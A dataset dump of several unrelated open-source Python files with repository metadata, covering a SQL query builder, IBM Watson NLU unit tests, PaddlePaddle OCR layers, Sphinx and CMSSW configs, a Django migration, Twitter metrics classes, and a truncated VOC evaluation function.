else:
raise QueryException('Can not have fieldless ON CONFLICT WHERE')
def _distinct_sql(self, **kwargs: Any) -> str:
if self._distinct_on:
return "DISTINCT ON({distinct_on}) ".format(
distinct_on=",".join(
term.get_sql(with_alias=True, **kwargs) for term in self._distinct_on
)
)
return super()._distinct_sql(**kwargs)
def _conflict_field_str(self, term: str) -> Optional[Field]:
if self._insert_table:
return Field(term, table=self._insert_table)
def _on_conflict_sql(self, **kwargs: Any) -> str:
if not self._on_conflict_do_nothing and len(self._on_conflict_do_updates) == 0:
if not self._on_conflict_fields:
return ""
raise QueryException("No handler defined for on conflict")
if self._on_conflict_do_updates and not self._on_conflict_fields:
raise QueryException("Can not have fieldless on conflict do update")
conflict_query = " ON CONFLICT"
if self._on_conflict_fields:
fields = [f.get_sql(with_alias=True, **kwargs)
for f in self._on_conflict_fields]
conflict_query += " (" + ', '.join(fields) + ")"
if self._on_conflict_wheres:
conflict_query += " WHERE {where}".format(
where=self._on_conflict_wheres.get_sql(subquery=True, **kwargs)
)
return conflict_query
def _on_conflict_action_sql(self, **kwargs: Any) -> str:
if self._on_conflict_do_nothing:
return " DO NOTHING"
elif len(self._on_conflict_do_updates) > 0:
action_sql = " DO UPDATE SET {updates}".format(
updates=",".join(
"{field}={value}".format(
field=field.get_sql(**kwargs),
value=value.get_sql(with_namespace=True, **kwargs),
)
for field, value in self._on_conflict_do_updates
)
)
if self._on_conflict_do_update_wheres:
action_sql += " WHERE {where}".format(
where=self._on_conflict_do_update_wheres.get_sql(subquery=True, with_namespace=True, **kwargs)
)
return action_sql
return ''
@builder
def returning(self, *terms: Any) -> "PostgreQueryBuilder":
for term in terms:
if isinstance(term, Field):
self._return_field(term)
elif isinstance(term, str):
self._return_field_str(term)
elif isinstance(term, ArithmeticExpression):
self._return_other(term)
elif isinstance(term, Function):
raise QueryException("Aggregate functions are not allowed in returning")
else:
self._return_other(self.wrap_constant(term, self._wrapper_cls))
def _validate_returning_term(self, term: Term) -> None:
for field in term.fields_():
if not any([self._insert_table, self._update_table, self._delete_from]):
raise QueryException("Returning can't be used in this query")
if (
field.table not in {self._insert_table, self._update_table}
and term not in self._from
):
raise QueryException("You can't return from other tables")
def _set_returns_for_star(self) -> None:
self._returns = [
returning for returning in self._returns if not hasattr(returning, "table")
]
self._return_star = True
def _return_field(self, term: Union[str, Field]) -> None:
if self._return_star:
# Do not add select terms after a star is selected
return
self._validate_returning_term(term)
if isinstance(term, Star):
self._set_returns_for_star()
self._returns.append(term)
def _return_field_str(self, term: Union[str, Field]) -> None:
if term == "*":
self._set_returns_for_star()
self._returns.append(Star())
return
if self._insert_table:
self._return_field(Field(term, table=self._insert_table))
elif self._update_table:
self._return_field(Field(term, table=self._update_table))
elif self._delete_from:
self._return_field(Field(term, table=self._from[0]))
else:
raise QueryException("Returning can't be used in this query")
def _return_other(self, function: Term) -> None:
self._validate_returning_term(function)
self._returns.append(function)
def _returning_sql(self, **kwargs: Any) -> str:
return " RETURNING {returning}".format(
returning=",".join(
term.get_sql(with_alias=True, **kwargs) for term in self._returns
),
)
def get_sql(self, with_alias: bool = False, subquery: bool = False, **kwargs: Any) -> str:
self._set_kwargs_defaults(kwargs)
querystring = super(PostgreQueryBuilder, self).get_sql(
with_alias, subquery, **kwargs
)
with_namespace = False
if self._update_table and self.from_:
with_namespace = True
querystring += self._on_conflict_sql(**kwargs)
querystring += self._on_conflict_action_sql(**kwargs)
if self._returns:
querystring += self._returning_sql(with_namespace=with_namespace, **kwargs)
return querystring
class PostgreSQLQuery(Query):
"""
Defines a query class for use with PostgreSQL.
"""
@classmethod
def _builder(cls, **kwargs) -> PostgreQueryBuilder:
return PostgreQueryBuilder(**kwargs)
class RedshiftQuery(Query):
"""
Defines a query class for use with Amazon Redshift.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> "QueryBuilder":
return QueryBuilder(dialect=Dialects.REDSHIFT, **kwargs)
class MSSQLQueryBuilder(QueryBuilder):
def __init__(self, **kwargs: Any) -> None:
super().__init__(dialect=Dialects.MSSQL, **kwargs)
self._top = None
@builder
def top(self, value: Union[str, int]) -> "MSSQLQueryBuilder":
"""
Implements support for simple TOP clauses.
Does not include support for PERCENT or WITH TIES.
https://docs.microsoft.com/en-us/sql/t-sql/queries/top-transact-sql?view=sql-server-2017
"""
try:
self._top = int(value)
except ValueError:
raise QueryException("TOP value must be an integer")
def get_sql(self, *args: Any, **kwargs: Any) -> str:
return super().get_sql(
*args, groupby_alias=False, **kwargs
)
def _top_sql(self) -> str:
if self._top:
return "TOP ({}) ".format(self._top)
else:
return ""
def _select_sql(self, **kwargs: Any) -> str:
return "SELECT {distinct}{top}{select}".format(
top=self._top_sql(),
distinct="DISTINCT " if self._distinct else "",
select=",".join(
term.get_sql(with_alias=True, subquery=True, **kwargs)
for term in self._selects
),
)
class MSSQLQuery(Query):
"""
Defines a query class for use with Microsoft SQL Server.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> MSSQLQueryBuilder:
return MSSQLQueryBuilder(**kwargs)
class ClickHouseQuery(Query):
"""
Defines a query class for use with Yandex ClickHouse.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> QueryBuilder:
return QueryBuilder(dialect=Dialects.CLICKHOUSE, wrap_set_operation_queries=False, as_keyword=True, **kwargs)
class SQLLiteValueWrapper(ValueWrapper):
def get_value_sql(self, *args: Any, **kwargs: Any) -> str:
if isinstance(self.value, bool):
return "1" if self.value else "0"
return super().get_value_sql(*args, **kwargs)
class SQLLiteQuery(Query):
"""
Defines a query class for use with Microsoft SQL Server.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> QueryBuilder:
return QueryBuilder(
dialect=Dialects.SQLLITE, wrapper_cls=SQLLiteValueWrapper, **kwargs
)
| 33.185938
| 117
| 0.615801
|
4a18ad0a477eaff536213311e1c0d91ab11c4ca3
| 6,671
|
py
|
Python
|
test/unit/test_natural_language_understanding.py
|
avilaroman/python-sdk
|
5f2dad0c91fa29d188c00f686993c4ab2243fdcd
|
[
"Apache-2.0"
] | 1
|
2019-06-29T19:32:38.000Z
|
2019-06-29T19:32:38.000Z
|
test/unit/test_natural_language_understanding.py
|
avilaroman/python-sdk
|
5f2dad0c91fa29d188c00f686993c4ab2243fdcd
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_natural_language_understanding.py
|
avilaroman/python-sdk
|
5f2dad0c91fa29d188c00f686993c4ab2243fdcd
|
[
"Apache-2.0"
] | 1
|
2019-11-26T03:04:12.000Z
|
2019-11-26T03:04:12.000Z
|
# coding: utf-8
from unittest import TestCase
from ibm_watson import NaturalLanguageUnderstandingV1
from ibm_watson.natural_language_understanding_v1 import \
Features, ConceptsOptions, EntitiesOptions, KeywordsOptions, CategoriesOptions, \
EmotionOptions, MetadataOptions, SemanticRolesOptions, RelationsOptions, \
SentimentOptions
import os
import pytest
import responses
base_url = 'https://gateway.watsonplatform.net'
default_url = '{0}/natural-language-understanding/api'.format(base_url)
class TestFeatures(TestCase):
def test_concepts(self):
c = Features(concepts=ConceptsOptions())
assert c._to_dict() == {'concepts': {}}
c = Features(concepts=ConceptsOptions(limit=10))
assert c._to_dict() == {'concepts': {'limit': 10}}
def test_entities(self):
e = Features(entities=EntitiesOptions())
assert e._to_dict() == {'entities': {}}
def test_keywords(self):
k = Features(keywords=KeywordsOptions())
assert k._to_dict() == {'keywords': {}}
def test_categories(self):
c = Features(categories=CategoriesOptions())
assert c._to_dict() == {'categories': {}}
def test_emotion(self):
e = Features(emotion=EmotionOptions())
assert e._to_dict() == {'emotion': {}}
def test_metadata(self):
m = Features(metadata=MetadataOptions())
assert m._to_dict() == {'metadata': {}}
def test_semantic_roles(self):
s = Features(semantic_roles=SemanticRolesOptions())
assert s._to_dict() == {'semantic_roles': {}}
def test_relations(self):
r = Features(relations=RelationsOptions())
assert r._to_dict() == {'relations': {}}
def test_sentiment(self):
s = Features(sentiment=SentimentOptions())
assert s._to_dict() == {'sentiment': {}}
class TestNaturalLanguageUnderstanding(TestCase):
def test_version_date(self):
with pytest.raises(TypeError):
NaturalLanguageUnderstandingV1() # pylint: disable=E1120
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
assert nlu
@pytest.mark.skipif(os.getenv('VCAP_SERVICES') is not None,
reason='credentials may come from VCAP_SERVICES')
def test_missing_credentials(self):
with pytest.raises(ValueError):
NaturalLanguageUnderstandingV1(version='2016-01-23')
with pytest.raises(ValueError):
NaturalLanguageUnderstandingV1(version='2016-01-23',
url='https://bogus.com')
def test_analyze_throws(self):
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
with pytest.raises(ValueError):
nlu.analyze(None, text="this will not work")
@responses.activate
def test_text_analyze(self):
nlu_url = "http://bogus.com/v1/analyze"
responses.add(responses.POST, nlu_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
nlu.analyze(Features(sentiment=SentimentOptions()), text="hello this is a test")
assert len(responses.calls) == 1
@responses.activate
def test_html_analyze(self):
nlu_url = "http://bogus.com/v1/analyze"
responses.add(responses.POST, nlu_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
nlu.analyze(Features(sentiment=SentimentOptions(),
emotion=EmotionOptions(document=False)),
html="<span>hello this is a test</span>")
assert len(responses.calls) == 1
@responses.activate
def test_url_analyze(self):
nlu_url = "http://bogus.com/v1/analyze"
responses.add(responses.POST, nlu_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
nlu.analyze(Features(sentiment=SentimentOptions(),
emotion=EmotionOptions(document=False)),
url="http://cnn.com",
xpath="/bogus/xpath", language="en")
assert len(responses.calls) == 1
@responses.activate
def test_list_models(self):
nlu_url = "http://bogus.com/v1/models"
responses.add(responses.GET, nlu_url, status=200,
body="{\"resulting_key\": true}",
content_type='application/json')
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
nlu.list_models()
assert len(responses.calls) == 1
@responses.activate
def test_delete_model(self):
model_id = "invalid_model_id"
nlu_url = "http://bogus.com/v1/models/" + model_id
responses.add(responses.DELETE, nlu_url, status=200,
body="{}", content_type='application/json')
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
nlu.delete_model(model_id)
assert len(responses.calls) == 1
| 43.318182
| 88
| 0.545945
|
4a18ae2e87d1a41ecee31c3bee66f57729d4b62d
| 448
|
py
|
Python
|
bdc_collection_builder/celery/worker.py
|
brazil-data-cube/bdc-collection-builder
|
765213341a30555d9ff2eab553ea659e278a69b5
|
[
"MIT"
] | 2
|
2020-02-06T13:52:30.000Z
|
2020-09-14T15:05:39.000Z
|
bdc_collection_builder/celery/worker.py
|
brazil-data-cube/bdc-collection-builder
|
765213341a30555d9ff2eab553ea659e278a69b5
|
[
"MIT"
] | 94
|
2020-02-03T19:34:14.000Z
|
2022-03-25T18:28:40.000Z
|
bdc_collection_builder/celery/worker.py
|
brazil-data-cube/bdc-collection-builder
|
765213341a30555d9ff2eab553ea659e278a69b5
|
[
"MIT"
] | 6
|
2020-02-04T17:21:21.000Z
|
2020-10-07T13:02:39.000Z
|
#
# This file is part of Brazil Data Cube Collection Builder.
# Copyright (C) 2019-2020 INPE.
#
# Brazil Data Cube Collection Builder is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
#
"""Defines a structure component to run celery worker."""
# Builder
from .. import create_app
from . import create_celery_app
app = create_app()
celery = create_celery_app(app)
| 26.352941
| 96
| 0.756696
|
4a18ae9058af5e714ffdea73c980d3aa565aab1d
| 5,441
|
py
|
Python
|
EISeg/eiseg/model/modeling/ocr.py
|
JamesLim-sy/PaddleSeg
|
f8cfb80f543a52599d1588026e71f069b702b781
|
[
"Apache-2.0"
] | 4,708
|
2019-08-26T13:54:39.000Z
|
2022-03-31T16:01:53.000Z
|
EISeg/eiseg/model/modeling/ocr.py
|
JamesLim-sy/PaddleSeg
|
f8cfb80f543a52599d1588026e71f069b702b781
|
[
"Apache-2.0"
] | 1,083
|
2019-09-12T02:57:24.000Z
|
2022-03-31T13:30:30.000Z
|
EISeg/eiseg/model/modeling/ocr.py
|
JamesLim-sy/PaddleSeg
|
f8cfb80f543a52599d1588026e71f069b702b781
|
[
"Apache-2.0"
] | 1,046
|
2019-08-26T22:05:01.000Z
|
2022-03-30T14:09:28.000Z
|
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
class SpatialGather_Module(nn.Layer):
"""
Aggregate the context features according to the initial
predicted probability distribution.
Employ the soft-weighted method to aggregate the context.
"""
def __init__(self, cls_num=0, scale=1):
super(SpatialGather_Module, self).__init__()
self.cls_num = cls_num
self.scale = scale
def forward(self, feats, probs):
b, c, h, w = probs.shape
probs = probs.reshape([b, c, -1])
feats = feats.reshape([b, feats.shape[1], -1])
feats = feats.transpose([0, 2, 1])
probs = F.softmax(self.scale * probs, axis=2)
ocr_context = paddle.unsqueeze(paddle.matmul(probs, feats).transpose([0, 2, 1]), 3)
return ocr_context
class SpatialOCR_Module(nn.Layer):
"""
Implementation of the OCR module:
We aggregate the global object representation to update the representation for each pixel.
"""
def __init__(self,
in_channels,
key_channels,
out_channels,
scale=1,
dropout=0.1,
norm_layer=nn.BatchNorm2D,
align_corners=True,
):
super(SpatialOCR_Module, self).__init__()
self.object_context_block = ObjectAttentionBlock2D(in_channels, key_channels, scale,
norm_layer, align_corners)
_in_channels = 2 * in_channels
self.conv_bn_dropout = nn.Sequential(
nn.Conv2D(_in_channels, out_channels, kernel_size=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(out_channels), nn.ReLU()),
nn.Dropout2D(dropout)
)
def forward(self, feats, proxy_feats):
context = self.object_context_block(feats, proxy_feats)
output = self.conv_bn_dropout(paddle.concat([context, feats], 1))
return output
class ObjectAttentionBlock2D(nn.Layer):
'''
The basic implementation for object context block
Input:
N X C X H X W
Parameters:
in_channels : the dimension of the input feature map
key_channels : the dimension after the key/query transform
scale : choose the scale to downsample the input feature maps (save memory cost)
bn_type : specify the bn type
Return:
N X C X H X W
'''
def __init__(self,
in_channels,
key_channels,
scale=1,
norm_layer=nn.BatchNorm2D,
align_corners=True):
super(ObjectAttentionBlock2D, self).__init__()
self.scale = scale
self.in_channels = in_channels
self.key_channels = key_channels
self.align_corners = align_corners
self.pool = nn.MaxPool2D(kernel_size=(scale, scale))
self.f_pixel = nn.Sequential(
nn.Conv2D(in_channels=self.in_channels, out_channels=self.key_channels,
kernel_size=1, stride=1,padding=0,bias_attr=False),
nn.Sequential(norm_layer(self.key_channels), nn.ReLU()),
nn.Conv2D(in_channels=self.key_channels, out_channels=self.key_channels,
kernel_size=1, stride=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(self.key_channels), nn.ReLU())
)
self.f_object = nn.Sequential(
nn.Conv2D(in_channels=self.in_channels, out_channels=self.key_channels,
kernel_size=1, stride=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(self.key_channels), nn.ReLU()),
nn.Conv2D(in_channels=self.key_channels, out_channels=self.key_channels,
kernel_size=1, stride=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(self.key_channels), nn.ReLU())
)
self.f_down = nn.Sequential(
nn.Conv2D(in_channels=self.in_channels, out_channels=self.key_channels,
kernel_size=1, stride=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(self.key_channels), nn.ReLU())
)
self.f_up = nn.Sequential(
nn.Conv2D(in_channels=self.key_channels, out_channels=self.in_channels,
kernel_size=1, stride=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(self.in_channels), nn.ReLU())
)
def forward(self, x, proxy):
b, c, h, w = x.shape
if self.scale > 1:
x = self.pool(x)
query = self.f_pixel(x).reshape([b, self.key_channels, -1])
query = query.transpose([0, 2, 1])
key = self.f_object(proxy).reshape([b, self.key_channels, -1])
value = self.f_down(proxy).reshape([b, self.key_channels, -1])
value = value.transpose([0, 2, 1])
sim_map = paddle.matmul(query, key)
sim_map = (self.key_channels ** -.5) * sim_map
sim_map = F.softmax(sim_map, axis=-1)
context = paddle.matmul(sim_map, value)
context = context.transpose([0, 2, 1])
context = context.reshape([b, self.key_channels, h, w])
context = self.f_up(context)
if self.scale > 1:
context = F.interpolate(context, size=[h, w], mode='bilinear', align_corners=self.align_corners)
return context
| 39.715328
| 108
| 0.602463
|
4a18aeec7caaeb51a24ff7779c6a989f560ccc49
| 235
|
py
|
Python
|
pydocx/test/__init__.py
|
botzill/pydocx
|
98c6aa626d875278240eabea8f86a914840499b3
|
[
"Apache-2.0"
] | 127
|
2015-01-12T22:35:34.000Z
|
2022-01-20T06:24:18.000Z
|
pydocx/test/__init__.py
|
turbo-q/pydocx
|
98c6aa626d875278240eabea8f86a914840499b3
|
[
"Apache-2.0"
] | 156
|
2015-01-05T19:55:56.000Z
|
2020-10-14T07:01:42.000Z
|
pydocx/test/__init__.py
|
turbo-q/pydocx
|
98c6aa626d875278240eabea8f86a914840499b3
|
[
"Apache-2.0"
] | 45
|
2015-02-22T18:52:08.000Z
|
2021-06-14T08:05:47.000Z
|
from pydocx.test.testcases import (
DocumentGeneratorTestCase,
DocXFixtureTestCaseFactory,
TranslationTestCase,
)
__all__ = [
'DocumentGeneratorTestCase',
'DocXFixtureTestCaseFactory',
'TranslationTestCase',
]
| 19.583333
| 35
| 0.748936
|
4a18afb6265e2a536665f0282971d1175a616a36
| 3,267
|
py
|
Python
|
docs/conf.py
|
zama-ai/concrete-numpy
|
ca60d646f26bc26c4c398aeb2bb89c572b3e6d63
|
[
"FTL"
] | 96
|
2022-01-12T15:07:50.000Z
|
2022-03-16T04:00:09.000Z
|
docs/conf.py
|
zama-ai/concrete-numpy
|
ca60d646f26bc26c4c398aeb2bb89c572b3e6d63
|
[
"FTL"
] | 10
|
2022-02-04T16:26:37.000Z
|
2022-03-25T14:08:01.000Z
|
docs/conf.py
|
zama-ai/concrete-numpy
|
ca60d646f26bc26c4c398aeb2bb89c572b3e6d63
|
[
"FTL"
] | 8
|
2022-01-12T15:07:55.000Z
|
2022-03-05T00:46:16.000Z
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'Concrete Numpy'
copyright = '2021, Zama'
author = 'Zama'
description = 'Zama Concrete Numpy'
root_url = os.environ.get("DOC_ROOT_URL", "/concrete-numpy")
root_url = root_url if root_url.endswith('/') else root_url + '/'
# The full version, including alpha/beta/rc tags
release = "0.5.0"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"myst_parser",
"sphinx_copybutton",
"nbsphinx",
"sphinx.ext.napoleon",
"sphinx.ext.viewcode",
]
myst_enable_extensions = [
"amsmath",
"colon_fence",
"dollarmath",
]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# Group member variables and methods separately (not alphabetically)
autodoc_member_order = "groupwise"
# -- Options for nbsphinx ----------------------------------------------------
nbsphinx_codecell_lexer = 'ipython3'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_zama_theme'
html_logo = '_static/CN_logo.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_theme_options = {
"github_url": "https://github.com/zama-ai/concrete-numpy",
"twitter_url": "https://twitter.com/zama_fhe",
"icon_links": [{
"name": "Discourse",
"url": "https://community.zama.ai/c/concrete-numpy/7",
"icon": "fab fa-discourse",
}],
"navigation_depth": 2,
"collapse_navigation": True,
"google_analytics_id": "G-XRM93J9QBW",
}
html_context = {
"show_version": True,
"author": author,
"description": description,
"language": "en",
"versions_url": "#",
}
html_title = "%s Manual" % (project)
# Uncomment for test
# html_extra_path = ["versions.json", "alert.html"]
def setup(app):
html_init = f"const CURRENT_VERSION = {release!r};"
html_init += f"const ROOT_URL = {root_url!r};"
app.add_js_file(None, body=html_init, priority=100)
| 32.029412
| 79
| 0.648913
|
4a18afd3a9192894cc7809390e1f230bfd754653
| 1,218
|
py
|
Python
|
L1TriggerConfig/GMTConfigProducers/test/minitestRS_cfg.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
L1TriggerConfig/GMTConfigProducers/test/minitestRS_cfg.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
L1TriggerConfig/GMTConfigProducers/test/minitestRS_cfg.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("L1ConfigWritePayloadDummy")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cout.enable = cms.untracked.bool(True)
process.MessageLogger.cout.threshold = cms.untracked.string('INFO')
process.MessageLogger.debugModules = cms.untracked.vstring('*')
# Generate dummy L1TriggerKeyList
process.load("CondTools.L1Trigger.L1TriggerKeyListDummy_cff")
# Get configuration data from OMDS. This is the subclass of L1ConfigOnlineProdBase.
process.load("L1TriggerConfig.GMTConfigProducers.L1MuGMTChannelMaskConfigOnline_cfi")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.source = cms.Source("EmptyIOVSource",
timetype = cms.string('runnumber'),
firstValue = cms.uint64(1),
lastValue = cms.uint64(1),
interval = cms.uint64(1)
)
process.getter = cms.EDAnalyzer("EventSetupRecordDataGetter",
toGet = cms.VPSet(cms.PSet(
record = cms.string('L1MuGMTChannelMaskRcd'),
data = cms.vstring('L1MuGMTChannelMask')
)),
verbose = cms.untracked.bool(True)
)
process.p = cms.Path(process.getter)
process.load("L1TriggerConfig.GMTConfigProducers.L1MuGMTRSKeysOnline_cff")
| 32.052632
| 85
| 0.776683
|
4a18b0d20323bbedfbe57c23ff0577809d7237fd
| 495
|
py
|
Python
|
research/views/__init__.py
|
ZviBaratz/pylabber
|
35337284f3d0615249f642743b993b7dad407390
|
[
"Apache-2.0"
] | 3
|
2020-08-28T21:33:07.000Z
|
2021-07-19T17:52:17.000Z
|
research/views/__init__.py
|
TheLabbingProject/pylabber
|
27d6073e7bde871c16912a8ea5e0e389711bbd9f
|
[
"Apache-2.0"
] | 74
|
2019-09-04T11:40:16.000Z
|
2022-01-03T19:43:04.000Z
|
research/views/__init__.py
|
ZviBaratz/pylabber
|
35337284f3d0615249f642743b993b7dad407390
|
[
"Apache-2.0"
] | 3
|
2019-05-07T07:09:05.000Z
|
2019-08-30T15:40:47.000Z
|
from research.views.data_acquisition import DataAcquisitionViewSet
from research.views.event import EventViewSet
from research.views.group import GroupViewSet
from research.views.measurement_definition import MeasurementDefinitionViewSet
from research.views.procedure import ProcedureViewSet
from research.views.procedure_step import ProcedureStepViewSet
from research.views.study import StudyViewSet
from research.views.subject import SubjectViewSet
from research.views.task import TaskViewSet
| 49.5
| 78
| 0.890909
|
4a18b10ef4b4b586170bbd67d94288f566d8044b
| 407
|
py
|
Python
|
catalog/migrations/0011_dayinstance_day_image.py
|
esalascolas/blog_diari
|
43f6d22db745a38559fc2dcb8ea52c39a9d28753
|
[
"MIT"
] | null | null | null |
catalog/migrations/0011_dayinstance_day_image.py
|
esalascolas/blog_diari
|
43f6d22db745a38559fc2dcb8ea52c39a9d28753
|
[
"MIT"
] | 13
|
2020-02-11T22:06:44.000Z
|
2022-02-10T08:23:36.000Z
|
catalog/migrations/0011_dayinstance_day_image.py
|
esalascolas/blog_diari
|
43f6d22db745a38559fc2dcb8ea52c39a9d28753
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.1 on 2018-05-27 10:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('catalog', '0010_auto_20180527_1235'),
]
operations = [
migrations.AddField(
model_name='dayinstance',
name='day_image',
field=models.ImageField(default='', upload_to='day'),
),
]
| 21.421053
| 65
| 0.601966
|
4a18b196a9f5b661711cdebaf9b8f0be96544f27
| 1,825
|
py
|
Python
|
pytweet/metrics.py
|
w3bhook/PyTweet
|
0920523dfeee62c7d38014ec09ff49ffb4a0e194
|
[
"MIT"
] | null | null | null |
pytweet/metrics.py
|
w3bhook/PyTweet
|
0920523dfeee62c7d38014ec09ff49ffb4a0e194
|
[
"MIT"
] | null | null | null |
pytweet/metrics.py
|
w3bhook/PyTweet
|
0920523dfeee62c7d38014ec09ff49ffb4a0e194
|
[
"MIT"
] | null | null | null |
from typing import Any, Dict
__all__ = (
"UserPublicMetrics",
"TweetPublicMetrics",
)
class UserPublicMetrics:
__slots__ = ("__original_payload", "_public")
def __init__(self, data: Dict[str, Any] = {}):
self.__original_payload = data
self._public = self.__original_payload.get("public_metrics")
def __repr__(self) -> str:
return f"UserPublicMetrics(user={self.__original_payload.get('username')} follower_count={self.follower_count} following_count={self.following_count} tweet_count={self.tweet_count})"
@property
def follower_count(self) -> int:
return int(self._public.get("followers_count"))
@property
def following_count(self) -> int:
return int(self._public.get("following_count"))
@property
def tweet_count(self) -> int:
return int(self._public.get("tweet_count"))
@property
def listed_count(self) -> int:
return int(self._public.get("listed_count"))
class TweetPublicMetrics:
__slots__ = ("__original_payload", "_public")
def __init__(self, data: Dict[str, Any] = {}) -> None:
self.__original_payload = data
self._public = self.__original_payload.get("public_metrics")
def __repr__(self) -> str:
return f"TweetPublicMetrics(like_count={self.like_count} retweet_count={self.retweet_count} reply_count={self.reply_count}> quote_count={self.quote_count})"
@property
def like_count(self) -> int:
return int(self._public.get("like_count"))
@property
def retweet_count(self) -> int:
return int(self._public.get("retweet_count"))
@property
def reply_count(self) -> int:
return int(self._public.get("reply_count"))
@property
def quote_count(self) -> int:
return int(self._public.get("quote_count"))
| 29.918033
| 190
| 0.676712
|
4a18b2245746a4e9bb62690dd6c9c4af2d3903be
| 12,965
|
py
|
Python
|
utils/eval_tool.py
|
Ray-Luo/BV
|
705a97b34f271d1d2b6eaba4777fcc48905c3852
|
[
"MIT"
] | null | null | null |
utils/eval_tool.py
|
Ray-Luo/BV
|
705a97b34f271d1d2b6eaba4777fcc48905c3852
|
[
"MIT"
] | null | null | null |
utils/eval_tool.py
|
Ray-Luo/BV
|
705a97b34f271d1d2b6eaba4777fcc48905c3852
|
[
"MIT"
] | null | null | null |
from __future__ import division
from collections import defaultdict
import itertools
import numpy as np
import six
from model.utils.bbox_tools import bbox_iou
def eval_detection_voc(
pred_bboxes, pred_labels, pred_scores, gt_bboxes, gt_labels,
gt_difficults=None,
iou_thresh=0.5, use_07_metric=False):
"""Calculate average precisions based on evaluation code of PASCAL VOC.
This function evaluates predicted bounding boxes obtained from a dataset
which has :math:`N` images by using average precision for each class.
The code is based on the evaluation code used in PASCAL VOC Challenge.
Args:
pred_bboxes (iterable of numpy.ndarray): An iterable of :math:`N`
sets of bounding boxes.
Its index corresponds to an index for the base dataset.
Each element of :obj:`pred_bboxes` is a set of coordinates
of bounding boxes. This is an array whose shape is :math:`(R, 4)`,
where :math:`R` corresponds
to the number of bounding boxes, which may vary among boxes.
The second axis corresponds to
:math:`y_{min}, x_{min}, y_{max}, x_{max}` of a bounding box.
pred_labels (iterable of numpy.ndarray): An iterable of labels.
Similar to :obj:`pred_bboxes`, its index corresponds to an
index for the base dataset. Its length is :math:`N`.
pred_scores (iterable of numpy.ndarray): An iterable of confidence
scores for predicted bounding boxes. Similar to :obj:`pred_bboxes`,
its index corresponds to an index for the base dataset.
Its length is :math:`N`.
gt_bboxes (iterable of numpy.ndarray): An iterable of ground truth
bounding boxes
whose length is :math:`N`. An element of :obj:`gt_bboxes` is a
bounding box whose shape is :math:`(R, 4)`. Note that the number of
bounding boxes in each image does not need to be same as the number
of corresponding predicted boxes.
gt_labels (iterable of numpy.ndarray): An iterable of ground truth
labels which are organized similarly to :obj:`gt_bboxes`.
gt_difficults (iterable of numpy.ndarray): An iterable of boolean
arrays which is organized similarly to :obj:`gt_bboxes`.
This tells whether the
corresponding ground truth bounding box is difficult or not.
By default, this is :obj:`None`. In that case, this function
considers all bounding boxes to be not difficult.
iou_thresh (float): A prediction is correct if its Intersection over
Union with the ground truth is above this value.
use_07_metric (bool): Whether to use PASCAL VOC 2007 evaluation metric
for calculating average precision. The default value is
:obj:`False`.
Returns:
dict:
The keys, value-types and the description of the values are listed
below.
* **ap** (*numpy.ndarray*): An array of average precisions. \
The :math:`l`-th value corresponds to the average precision \
for class :math:`l`. If class :math:`l` does not exist in \
either :obj:`pred_labels` or :obj:`gt_labels`, the corresponding \
